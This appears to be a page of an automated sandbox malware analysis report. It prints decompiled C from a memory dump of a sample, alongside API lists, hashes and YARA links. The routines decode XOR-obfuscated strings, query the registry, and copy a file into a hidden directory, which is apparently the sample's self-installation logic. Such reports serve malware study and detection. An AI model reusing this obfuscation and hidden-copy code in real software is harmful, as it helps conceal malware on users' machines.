0x00e892be
0x00e892c3
0x00e892c8
0x00e892d0
0x00e892d2
0x00e892d2
0x00e892d4
0x00e892d7
0x00e892d8
0x00000000

APIs

Part of subcall function 00E8903F: Sleep.KERNELBASE(00000064,?,?,?,00000104,00000104), ref: 00E89066

PathFileExistsA.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00E89271
PathFileExistsA.KERNELBASE(?), ref: 00E89280
CreateDirectoryA.KERNELBASE(?,00000000), ref: 00E8928E
SetFileAttributesA.KERNELBASE(?,00000006), ref: 00E89297
CopyFileA.KERNEL32 ref: 00E892A3

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ExistsPath$AttributesCopyCreateDirectorySleep
String ID:
API String ID: 3090365614-0
Opcode ID: 413e9a0793be47fe442c6b08a9fba9a8b197fc90a3319cf397d851df7d3a4121
Instruction ID: 52a37f2d6234ad4f4bbb232a3b526c793c6d1166a2ce3da6f7c18a419b9403f4
Opcode Fuzzy Hash: 413e9a0793be47fe442c6b08a9fba9a8b197fc90a3319cf397d851df7d3a4121
Instruction Fuzzy Hash: 3C21F570D042047FEB1277B95D8AEBF7AEC9F86344F181464F58EB3167DA34990583A2

Uniqueness

Uniqueness Score: -1.00%

Function 00E8A87E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 107
registryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00E8A87E(void* __ebx, void* __edi, void* __esi) {
				signed int _t38;
				long _t45;
				void* _t48;
				void _t49;
				void _t50;
				void* _t62;
				int* _t64;
				char _t66;
				signed int _t69;
				intOrPtr* _t77;
				void* _t78;
				signed int _t79;
				void* _t81;
				void* _t90;
				void* _t91;
				signed int _t93;
				void* _t95;

				_t93 = _t95 - 0xd0;
				_t38 =  *0xea9014; // 0xa413846
				 *(_t93 + 0xcc) = _t38 ^ _t93;
				_push(__edi);
				 *(_t93 - 0x7c) = 1;
				 *(_t93 - 0x74) = 0;
				E00E8D0F0(__edi, _t93 - 0x34, 0, 0xff);
				asm("movaps xmm0, [0xe7dbd0]");
				asm("movups [ebp-0x70], xmm0");
				_t64 = 0;
				 *(_t93 - 0x78) = 0xff;
				asm("movaps xmm0, [0xe7dca0]");
				asm("movups [ebp-0x60], xmm0");
				 *((intOrPtr*)(_t93 - 0x50)) = 0xd071312;
				 *((intOrPtr*)(_t93 - 0x4c)) = 0x15033310;
				 *((intOrPtr*)(_t93 - 0x48)) = 0x505001b;
				 *((char*)(_t93 - 0x44)) = 0;
				do {
					_t11 = _t64 + 0x40; // 0x40
					 *(_t93 + _t64 - 0x70) =  *(_t93 + _t64 - 0x70) ^ _t11;
					_t64 = _t64 + 1;
				} while (_t64 < 0x2c);
				 *((char*)(_t93 - 0x44)) = 0;
				_t45 = RegOpenKeyExA(0x80000002, _t93 - 0x70, 0, 0x20019, _t93 - 0x74); // executed
				if(_t45 == 0) {
					 *((intOrPtr*)(_t93 - 0x40)) = 0x2f2b3402;
					 *((intOrPtr*)(_t93 - 0x3c)) = 0x25270920;
					 *((short*)(_t93 - 0x38)) = 0x310d;
					 *((char*)(_t93 - 0x36)) = 0;
					RegQueryValueExA( *(_t93 - 0x74), E00E8282B(_t93 - 0x40), 0, _t93 - 0x7c, _t93 - 0x34, _t93 - 0x78); // executed
				}
				_push(0x104);
				_t62 = E00E909A2();
				_t77 = _t93 - 0x34;
				_t90 = _t62 - _t77;
				do {
					_t66 =  *_t77;
					 *((char*)(_t77 + _t90)) = _t66;
					_t77 = _t77 + 1;
				} while (_t66 != 0);
				 *((intOrPtr*)(_t93 - 0x40)) = 0x757a391f;
				 *((intOrPtr*)(_t93 - 0x3c)) = 0x2e342409;
				 *((short*)(_t93 - 0x38)) = 0x29;
				_t48 = E00E82D10(_t93 - 0x40);
				_t78 = _t48;
				_t91 = _t48;
				do {
					_t49 =  *_t78;
					_t78 = _t78 + 1;
				} while (_t49 != 0);
				_t79 = _t78 - _t91;
				_t34 = _t62 - 1; // -1
				_t81 = _t34;
				do {
					_t50 =  *(_t81 + 1);
					_t81 = _t81 + 1;
				} while (_t50 != 0);
				_t69 = _t79 >> 2;
				memcpy(_t81, _t91, _t69 << 2);
				memcpy(_t91 + _t69 + _t69, _t91, _t79 & 0x00000003);
				return E00E8AE43( *(_t93 + 0xcc) ^ _t93);
			}

0x00e8a87f
0x00e8a88c
0x00e8a893
0x00e8a89b
0x00e8a8a1
0x00e8a8b0
0x00e8a8b3
0x00e8a8b8
0x00e8a8c2
0x00e8a8c6
0x00e8a8c8
0x00e8a8cb
0x00e8a8d2
0x00e8a8d6
0x00e8a8dd
0x00e8a8e4
0x00e8a8eb
0x00e8a8ee
0x00e8a8ee
0x00e8a8f1
0x00e8a8f5
0x00e8a8f6
0x00e8a8fe
0x00e8a911
0x00e8a919
0x00e8a91e
0x00e8a929
0x00e8a934
0x00e8a93f
0x00e8a94b
0x00e8a94b
0x00e8a951
0x00e8a95b
0x00e8a95d
0x00e8a965
0x00e8a967
0x00e8a967
0x00e8a969
0x00e8a96c
0x00e8a96d
0x00e8a974
0x00e8a97b
0x00e8a982
0x00e8a988
0x00e8a98d
0x00e8a98f
0x00e8a991
0x00e8a991
0x00e8a993
0x00e8a994
0x00e8a998
0x00e8a99a
0x00e8a99a
0x00e8a99d
0x00e8a99d
0x00e8a9a0
0x00e8a9a1
0x00e8a9a9
0x00e8a9ac
0x00e8a9b3
0x00e8a9cc

APIs

RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,?,00000000,?,00000000), ref: 00E8A911
RegQueryValueExA.KERNELBASE(?,00000000,00000000,?,?,?), ref: 00E8A94B

Strings

F8A/, xrefs: 00E8A88C
$4., xrefs: 00E8A97B

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: OpenQueryValue
String ID: $4.$F8A/
API String ID: 4153817207-15763446
Opcode ID: c9b4d5723389ee0b0ea3a1b8b7900b9f7420e1d9808a0da9445db08a95c18417
Instruction ID: 6e703576d6f5304e410aed1bf210962ad054b9a32e6344fe5b63376afa0d17a5
Opcode Fuzzy Hash: c9b4d5723389ee0b0ea3a1b8b7900b9f7420e1d9808a0da9445db08a95c18417
Instruction Fuzzy Hash: A041A571D042489FEB25DFA9DC80AEEBBB8FF49304F14122DE849B7212E7305949CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E82D46, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00E82D46(void* __ebx, void* __edi, void* __esi) {
				signed int _t20;
				intOrPtr* _t24;
				void _t27;
				void _t28;
				void* _t31;
				void _t32;
				void _t33;
				void* _t34;
				void* _t36;
				void _t37;
				void _t38;
				int _t41;
				intOrPtr* _t45;
				char _t49;
				signed int _t51;
				signed int _t57;
				signed int _t64;
				void* _t72;
				void* _t73;
				signed int _t74;
				void* _t75;
				signed int _t76;
				void* _t77;
				signed int _t78;
				void* _t80;
				void* _t85;
				void* _t90;
				void* _t97;
				void* _t98;
				void* _t99;
				char* _t102;
				signed int _t104;
				void* _t106;
				void* _t107;
				void* _t108;

				_t20 =  *0xea9014; // 0xa413846
				 *(_t104 + 0xc) = _t20 ^ _t104;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t45 = 0xeaab00;
				E00E8A476(0xeaab00, __edi, __esi, 0xeaab00);
				_push(0x104);
				_t102 = E00E909A2();
				do {
					_t24 = E00E9187C( *_t45);
					_t72 = _t102 - _t24;
					do {
						_t49 =  *_t24;
						 *((char*)(_t72 + _t24)) = _t49;
						_t24 = _t24 + 1;
					} while (_t49 != 0);
					 *((char*)(_t104 + 0x11)) = _t49;
					 *((char*)(_t104 + 0x11)) = _t49;
					_t73 = _t104 + 0x10;
					 *(_t104 + 0x10) = 0x5c;
					_t97 = _t73;
					do {
						_t27 =  *_t73;
						_t73 = _t73 + 1;
					} while (_t27 != 0);
					_t74 = _t73 - _t97;
					_t7 = _t102 - 1; // -1
					_t80 = _t7;
					do {
						_t28 =  *(_t80 + 1);
						_t80 = _t80 + 1;
					} while (_t28 != 0);
					_t51 = _t74 >> 2;
					memcpy(_t80, _t97, _t51 << 2);
					_t54 = _t74 & 0x00000003;
					memcpy(_t97 + _t51 + _t51, _t97, _t74 & 0x00000003);
					_t106 = _t104 + 0x18;
					_t31 = E00E8A87E(_t45, _t97 + (_t74 & 0x00000003) + _t54, _t97);
					_t75 = _t31;
					_t98 = _t31;
					do {
						_t32 =  *_t75;
						_t75 = _t75 + 1;
					} while (_t32 != 0);
					_t76 = _t75 - _t98;
					_t10 = _t102 - 1; // -1
					_t85 = _t10;
					do {
						_t33 =  *(_t85 + 1);
						_t85 = _t85 + 1;
					} while (_t33 != 0);
					 *((intOrPtr*)(_t106 + 0x14)) = 0x2f2e256e;
					_t57 = _t76 >> 2;
					_t34 = memcpy(_t85, _t98, _t57 << 2);
					_t107 = _t106 + 0xc;
					 *(_t107 + 0x18) = _t34;
					memcpy(_t98 + _t57 + _t57, _t98, _t76 & 0x00000003);
					_t108 = _t107 + 0xc;
					_t15 = _t108 + 0x14; // 0x2f2e256e
					_t36 = E00E832BE(_t15);
					_t77 = _t36;
					_t99 = _t36;
					do {
						_t37 =  *_t77;
						_t77 = _t77 + 1;
					} while (_t37 != 0);
					_t78 = _t77 - _t99;
					_t16 = _t102 - 1; // -1
					_t90 = _t16;
					do {
						_t38 =  *(_t90 + 1);
						_t90 = _t90 + 1;
					} while (_t38 != 0);
					_t64 = _t78 >> 2;
					memcpy(_t90, _t99, _t64 << 2);
					memcpy(_t99 + _t64 + _t64, _t99, _t78 & 0x00000003);
					_t104 = _t108 + 0x18;
					_t41 = PathFileExistsA(_t102); // executed
					if(_t41 == 0) {
						goto L16;
					}
					L19:
					return E00E8AE43( *(_t104 + 0x1c) ^ _t104);
					L16:
					_t45 = _t45 + 4;
				} while (_t45 < 0xeaab14);
				goto L19;
			}

0x00e82d49
0x00e82d50
0x00e82d54
0x00e82d56
0x00e82d57
0x00e82d58
0x00e82d5e
0x00e82d63
0x00e82d6e
0x00e82d70
0x00e82d72
0x00e82d7a
0x00e82d7c
0x00e82d7c
0x00e82d7e
0x00e82d81
0x00e82d82
0x00e82d88
0x00e82d8e
0x00e82d92
0x00e82d96
0x00e82d9a
0x00e82d9c
0x00e82d9c
0x00e82d9e
0x00e82d9f
0x00e82da3
0x00e82da5
0x00e82da5
0x00e82da8
0x00e82da8
0x00e82dab
0x00e82dac
0x00e82db2
0x00e82db5
0x00e82db9
0x00e82dbc
0x00e82dbc
0x00e82dbe
0x00e82dc3
0x00e82dc5
0x00e82dc7
0x00e82dc7
0x00e82dc9
0x00e82dca
0x00e82dce
0x00e82dd0
0x00e82dd0
0x00e82dd3
0x00e82dd3
0x00e82dd6
0x00e82dd7
0x00e82ddd
0x00e82de5
0x00e82de8
0x00e82de8
0x00e82dec
0x00e82df3
0x00e82df3
0x00e82df5
0x00e82df9
0x00e82dfe
0x00e82e00
0x00e82e02
0x00e82e02
0x00e82e04
0x00e82e05
0x00e82e09
0x00e82e0b
0x00e82e0b
0x00e82e0e
0x00e82e0e
0x00e82e11
0x00e82e12
0x00e82e18
0x00e82e1b
0x00e82e22
0x00e82e22
0x00e82e25
0x00e82e2d
0x00000000
0x00000000
0x00e82e42
0x00e82e54
0x00e82e2f
0x00e82e2f
0x00e82e32
0x00000000

APIs

PathFileExistsA.KERNELBASE(00000000), ref: 00E82E25

Strings

n%./, xrefs: 00E82DF5
F8A/, xrefs: 00E82D49

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ExistsFilePath
String ID: F8A/$n%./
API String ID: 1174141254-596831759
Opcode ID: 2fd86cfbd9cb4d75980fcee8df0e3127996983a93a12a5768a9f9a44873c242d
Instruction ID: 15ee15f772b1c54c13a4ce7fb3ded42546dca12e4b74f1dbc319533952826560
Opcode Fuzzy Hash: 2fd86cfbd9cb4d75980fcee8df0e3127996983a93a12a5768a9f9a44873c242d
Instruction Fuzzy Hash: D1316D21608B420F5F1AEE3C58112BBBFD2AFD634074855ACD9CEBB346DA115D0EC3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E8903F, Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 172
sleepCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00E8903F(void* __ebx, intOrPtr* __ecx, char __edx, void* __edi, void* __esi, void* __ebp, void* __eflags) {
				signed int _v4;
				char _v8;
				char _v12;
				char _v15;
				void* _v16;
				signed int _t38;
				signed int _t44;
				intOrPtr* _t46;
				void _t49;
				void _t50;
				void* _t53;
				void _t54;
				void _t55;
				char _t58;
				signed char _t59;
				void _t61;
				void _t62;
				void* _t65;
				void _t66;
				void _t67;
				void* _t70;
				void _t71;
				void _t72;
				intOrPtr* _t78;
				signed int _t81;
				char _t83;
				signed int _t85;
				char _t90;
				signed int _t92;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t105;
				signed int _t112;
				void* _t122;
				void* _t123;
				signed int _t124;
				void* _t125;
				signed int _t126;
				char* _t128;
				void* _t129;
				signed int _t130;
				void* _t131;
				signed int _t132;
				void* _t133;
				signed int _t134;
				void* _t136;
				void* _t141;
				void* _t146;
				void* _t151;
				void* _t156;
				void* _t162;
				char* _t163;
				void* _t164;
				void* _t165;
				void* _t166;
				void* _t167;
				intOrPtr* _t169;
				signed int _t170;
				signed int _t171;
				void* _t173;
				void* _t175;
				void* _t177;
				void* _t179;
				void* _t182;

				_t182 = __eflags;
				_t171 =  &_v16;
				_t38 =  *0xea9014; // 0xa413846
				_v4 = _t38 ^ _t171;
				_v12 = __edx;
				_t169 = __ecx;
				_t78 = E00E909A2(); // executed
				Sleep(0x64); // executed
				E00E90FD9(E00E8A7BF(_t182));
				 *_t171 = 0xeaab20;
				E00E8A476(_t78, __edi, __esi, 0x104);
				_t44 = E00E90FB8();
				_t81 = 5;
				asm("cdq");
				_t46 = E00E9187C( *((intOrPtr*)(0xeaab20 + _t44 % _t81 * 4)));
				_t122 = _t78 - _t46;
				do {
					_t83 =  *_t46;
					 *((char*)(_t122 + _t46)) = _t83;
					_t46 = _t46 + 1;
				} while (_t83 != 0);
				_v15 = _t83;
				_v15 = _t83;
				_t123 =  &_v16;
				_v16 = 0x5c;
				_t162 = _t123;
				do {
					_t49 =  *_t123;
					_t123 = _t123 + 1;
				} while (_t49 != 0);
				_t124 = _t123 - _t162;
				_t14 = _t78 - 1; // -1
				_t136 = _t14;
				do {
					_t50 =  *(_t136 + 1);
					_t136 = _t136 + 1;
				} while (_t50 != 0);
				_t85 = _t124 >> 2;
				memcpy(_t136, _t162, _t85 << 2);
				memcpy(_t162 + _t85 + _t85, _t162, _t124 & 0x00000003);
				_t173 = _t171 + 0x18;
				_t53 = E00E8A582(_t124 & 0x00000003);
				_t163 =  *_t169;
				_t125 = _t53;
				do {
					_t90 =  *_t53;
					_t53 = _t53 + 1;
					 *_t163 = _t90;
					_t163 = _t163 + 1;
				} while (_t90 != 0);
				_t164 = _t125;
				do {
					_t54 =  *_t125;
					_t125 = _t125 + 1;
				} while (_t54 != 0);
				_t126 = _t125 - _t164;
				_t17 = _t78 - 1; // -1
				_t141 = _t17;
				do {
					_t55 =  *(_t141 + 1);
					_t141 = _t141 + 1;
				} while (_t55 != 0);
				_t92 = _t126 >> 2;
				memcpy(_t141, _t164, _t92 << 2);
				_t170 = 3;
				memcpy(_t164 + _t92 + _t92, _t164, _t126 & _t170);
				_t175 = _t173 + 0x18;
				_t128 =  *_v12;
				_t97 = _t78;
				do {
					_t58 =  *_t97;
					_t97 = _t97 + 1;
					 *_t128 = _t58;
					_t128 = _t128 + 1;
				} while (_t58 != 0);
				_v15 = _t58;
				_t129 =  &_v16;
				_t59 = 0x1c;
				_v15 = 0;
				_v16 = _t59 ^ 0x00000040;
				_t165 = _t129;
				do {
					_t61 =  *_t129;
					_t129 = _t129 + 1;
				} while (_t61 != 0);
				_t130 = _t129 - _t165;
				_t25 = _t78 - 1; // -1
				_t146 = _t25;
				do {
					_t62 =  *(_t146 + 1);
					_t146 = _t146 + 1;
				} while (_t62 != 0);
				_t99 = _t130 >> 2;
				memcpy(_t146, _t165, _t99 << 2);
				memcpy(_t165 + _t99 + _t99, _t165, _t130 & _t170);
				_t177 = _t175 + 0x18;
				_t65 = E00E8A829(_t130 & _t170, 4);
				_t131 = _t65;
				_t166 = _t65;
				do {
					_t66 =  *_t131;
					_t131 = _t131 + 1;
				} while (_t66 != 0);
				_t132 = _t131 - _t166;
				_t28 = _t78 - 1; // -1
				_t151 = _t28;
				do {
					_t67 =  *(_t151 + 1);
					_t151 = _t151 + 1;
				} while (_t67 != 0);
				_v12 = 0x263a246e;
				_t105 = _t132 >> 2;
				_v8 = memcpy(_t151, _t166, _t105 << 2);
				memcpy(_t166 + _t105 + _t105, _t166, _t132 & _t170);
				_t179 = _t177 + 0x18;
				_t33 =  &_v12; // 0x263a246e
				_t70 = E00E832BE(_t33);
				_t133 = _t70;
				_t167 = _t70;
				do {
					_t71 =  *_t133;
					_t133 = _t133 + 1;
				} while (_t71 != 0);
				_t134 = _t133 - _t167;
				_t34 = _t78 - 1; // -1
				_t156 = _t34;
				do {
					_t72 =  *(_t156 + 1);
					_t156 = _t156 + 1;
				} while (_t72 != 0);
				_t112 = _t134 >> 2;
				memcpy(_t156, _t167, _t112 << 2);
				memcpy(_t167 + _t112 + _t112, _t167, _t134 & _t170);
				return E00E8AE43(_v4 ^ _t179 + 0x18);
			}

0x00e8903f
0x00e8903f
0x00e89042
0x00e89049
0x00e89056
0x00e8905a
0x00e89064
0x00e89066
0x00e89072
0x00e89077
0x00e8907e
0x00e89083
0x00e8908a
0x00e8908b
0x00e89095
0x00e8909d
0x00e8909f
0x00e8909f
0x00e890a1
0x00e890a4
0x00e890a5
0x00e890ab
0x00e890b1
0x00e890b5
0x00e890b9
0x00e890bd
0x00e890bf
0x00e890bf
0x00e890c1
0x00e890c2
0x00e890c6
0x00e890c8
0x00e890c8
0x00e890cb
0x00e890cb
0x00e890ce
0x00e890cf
0x00e890d5
0x00e890d8
0x00e890df
0x00e890df
0x00e890e1
0x00e890e6
0x00e890e9
0x00e890eb
0x00e890eb
0x00e890ed
0x00e890ee
0x00e890f0
0x00e890f1
0x00e890f5
0x00e890f7
0x00e890f7
0x00e890f9
0x00e890fa
0x00e890fe
0x00e89100
0x00e89100
0x00e89103
0x00e89103
0x00e89106
0x00e89107
0x00e8910d
0x00e89110
0x00e8911a
0x00e8911d
0x00e8911d
0x00e8911f
0x00e89121
0x00e89123
0x00e89123
0x00e89125
0x00e89126
0x00e89128
0x00e89129
0x00e8912d
0x00e89131
0x00e89137
0x00e8913a
0x00e8913f
0x00e89143
0x00e89145
0x00e89145
0x00e89147
0x00e89148
0x00e8914c
0x00e8914e
0x00e8914e
0x00e89151
0x00e89151
0x00e89154
0x00e89155
0x00e8915b
0x00e8915e
0x00e89164
0x00e89164
0x00e89168
0x00e8916d
0x00e8916f
0x00e89171
0x00e89171
0x00e89173
0x00e89174
0x00e89178
0x00e8917a
0x00e8917a
0x00e8917d
0x00e8917d
0x00e89180
0x00e89181
0x00e89187
0x00e8918f
0x00e89196
0x00e8919c
0x00e8919c
0x00e8919e
0x00e891a2
0x00e891a7
0x00e891a9
0x00e891ab
0x00e891ab
0x00e891ad
0x00e891ae
0x00e891b2
0x00e891b4
0x00e891b4
0x00e891b7
0x00e891b7
0x00e891ba
0x00e891bb
0x00e891c3
0x00e891c6
0x00e891cc
0x00e891e0

APIs

Sleep.KERNELBASE(00000064,?,?,?,00000104,00000104), ref: 00E89066

Part of subcall function 00E8A7BF: GetSystemTime.KERNEL32(?,?,?,?,00E82EFB), ref: 00E8A7D3
Part of subcall function 00E8A7BF: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00E82EFB), ref: 00E8A7E1

Strings

n$:&, xrefs: 00E8919E
F8A/, xrefs: 00E89042

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$System$FileSleep
String ID: F8A/$n$:&
API String ID: 1465189569-1965222857
Opcode ID: adfc4dd69fc23bcc19680b21d6fc13039d0de7b294365213aa66d920e25f6043
Instruction ID: d103421d52ef3b33078954888002156ded926eea80260a7ebd1216e8fe6cf6e9
Opcode Fuzzy Hash: adfc4dd69fc23bcc19680b21d6fc13039d0de7b294365213aa66d920e25f6043
Instruction Fuzzy Hash: 91512D616087834FDF19EE38542527ABBD39FD6344B08559CD8DE6B347CA225D0EC3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E82ECE, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108
sleepCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00E82ECE(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v19;
				char _v20;
				void* __ebp;
				signed int _t26;
				signed int _t32;
				intOrPtr* _t34;
				void _t37;
				void _t38;
				void* _t41;
				void _t42;
				void _t43;
				void* _t46;
				void _t47;
				void _t48;
				void* _t54;
				signed int _t56;
				char _t58;
				signed int _t60;
				signed int _t66;
				signed int _t73;
				void* _t82;
				void* _t83;
				signed int _t84;
				void* _t85;
				signed int _t86;
				void* _t87;
				signed int _t88;
				void* _t90;
				void* _t95;
				void* _t100;
				void* _t106;
				void* _t107;
				void* _t108;
				signed int _t109;
				intOrPtr* _t110;
				void* _t117;

				_t117 = __eflags;
				_t26 =  *0xea9014; // 0xa413846
				_v8 = _t26 ^ _t109;
				_t54 = E00E909A2(); // executed
				Sleep(0x64); // executed
				E00E90FD9(E00E8A7BF(_t117));
				 *_t110 = 0xeaab00;
				E00E8A476(_t54, __edi, __esi, 0x104);
				_t32 = E00E90FB8();
				_t56 = 5;
				asm("cdq");
				_t34 = E00E9187C( *((intOrPtr*)(0xeaab00 + _t32 % _t56 * 4)));
				_t82 = _t54 - _t34;
				do {
					_t58 =  *_t34;
					 *((char*)(_t82 + _t34)) = _t58;
					_t34 = _t34 + 1;
				} while (_t58 != 0);
				_v19 = _t58;
				_v19 = _t58;
				_t83 =  &_v20;
				_v20 = 0x5c;
				_t106 = _t83;
				do {
					_t37 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t37 != 0);
				_t84 = _t83 - _t106;
				_t13 = _t54 - 1; // -1
				_t90 = _t13;
				do {
					_t38 =  *(_t90 + 1);
					_t90 = _t90 + 1;
				} while (_t38 != 0);
				_t60 = _t84 >> 2;
				memcpy(_t90, _t106, _t60 << 2);
				memcpy(_t106 + _t60 + _t60, _t106, _t84 & 0x00000003);
				_t41 = E00E8A87E(_t54, _t106 + (_t84 & 0x00000003) + (_t84 & 0x00000003), _t106);
				_t85 = _t41;
				_t107 = _t41;
				do {
					_t42 =  *_t85;
					_t85 = _t85 + 1;
				} while (_t42 != 0);
				_t86 = _t85 - _t107;
				_t16 = _t54 - 1; // -1
				_t95 = _t16;
				do {
					_t43 =  *(_t95 + 1);
					_t95 = _t95 + 1;
				} while (_t43 != 0);
				_v16 = 0x2f2e256e;
				_t66 = _t86 >> 2;
				_v12 = memcpy(_t95, _t107, _t66 << 2);
				memcpy(_t107 + _t66 + _t66, _t107, _t86 & 0x00000003);
				_t21 =  &_v16; // 0x2f2e256e
				_t46 = E00E832BE(_t21);
				_t87 = _t46;
				_t108 = _t46;
				do {
					_t47 =  *_t87;
					_t87 = _t87 + 1;
				} while (_t47 != 0);
				_t88 = _t87 - _t108;
				_t22 = _t54 - 1; // -1
				_t100 = _t22;
				do {
					_t48 =  *(_t100 + 1);
					_t100 = _t100 + 1;
				} while (_t48 != 0);
				_t73 = _t88 >> 2;
				memcpy(_t100, _t108, _t73 << 2);
				memcpy(_t108 + _t73 + _t73, _t108, _t88 & 0x00000003);
				return E00E8AE43(_v8 ^ _t109);
			}

0x00e82ece
0x00e82ed4
0x00e82edb
0x00e82eee
0x00e82ef0
0x00e82efc
0x00e82f01
0x00e82f08
0x00e82f0d
0x00e82f14
0x00e82f15
0x00e82f1f
0x00e82f27
0x00e82f29
0x00e82f29
0x00e82f2b
0x00e82f2e
0x00e82f2f
0x00e82f35
0x00e82f3a
0x00e82f3d
0x00e82f40
0x00e82f43
0x00e82f45
0x00e82f45
0x00e82f47
0x00e82f48
0x00e82f4c
0x00e82f4e
0x00e82f4e
0x00e82f51
0x00e82f51
0x00e82f54
0x00e82f55
0x00e82f5b
0x00e82f5e
0x00e82f65
0x00e82f67
0x00e82f6c
0x00e82f6e
0x00e82f70
0x00e82f70
0x00e82f72
0x00e82f73
0x00e82f77
0x00e82f79
0x00e82f79
0x00e82f7c
0x00e82f7c
0x00e82f7f
0x00e82f80
0x00e82f86
0x00e82f8d
0x00e82f94
0x00e82f9a
0x00e82f9c
0x00e82f9f
0x00e82fa4
0x00e82fa6
0x00e82fa8
0x00e82fa8
0x00e82faa
0x00e82fab
0x00e82faf
0x00e82fb1
0x00e82fb1
0x00e82fb4
0x00e82fb4
0x00e82fb7
0x00e82fb8
0x00e82fc0
0x00e82fc3
0x00e82fca
0x00e82fda

APIs

Sleep.KERNELBASE(00000064), ref: 00E82EF0

Part of subcall function 00E8A7BF: GetSystemTime.KERNEL32(?,?,?,?,00E82EFB), ref: 00E8A7D3
Part of subcall function 00E8A7BF: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00E82EFB), ref: 00E8A7E1

Strings

n%./, xrefs: 00E82F9C
F8A/, xrefs: 00E82ED4

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$System$FileSleep
String ID: F8A/$n%./
API String ID: 1465189569-596831759
Opcode ID: 7b7974a5861df702d59d3fa7ee521a79f08b628d2e95098cf8e0d2fd4e1668a5
Instruction ID: 7c9d71dd331a1604d51d9adf9751c70b5199f49d91cd538ef74708b15a0468f1
Opcode Fuzzy Hash: 7b7974a5861df702d59d3fa7ee521a79f08b628d2e95098cf8e0d2fd4e1668a5
Instruction Fuzzy Hash: 9B316B21B046468FDF19AE7C68151BEBBF2AFC630070891ACD9CA7B246DA615D0EC360

Uniqueness

Uniqueness Score: -1.00%

Function 00E88B64, Relevance: 4.5, APIs: 3, Instructions: 27
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E88B64(long _a4, void* _a8, long _a12) {
				void* _t5;
				int _t8;
				void* _t10;

				_t5 = CreateFileA(_a4, 0xc0000000, 0, 0, 2, 6, 0); // executed
				_t10 = _t5;
				WriteFile(_t10, _a8, _a12,  &_a4, 0); // executed
				_t8 = FindCloseChangeNotification(_t10); // executed
				return _t8;
			}

0x00e88b7a
0x00e88b81
0x00e88b8e
0x00e88b95
0x00e88b9e

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000006,00000000,00000000,00000000,00000000,00E85565,00000000,?,?), ref: 00E88B7A
WriteFile.KERNELBASE(00000000,?,?,?,00000000), ref: 00E88B8E
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00E88B95

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ChangeCloseCreateFindNotificationWrite
String ID:
API String ID: 3805958096-0
Opcode ID: ec46a6c5c864c51f4e21e30cfd2dcdae9924df048e89885850573b8e7d46a410
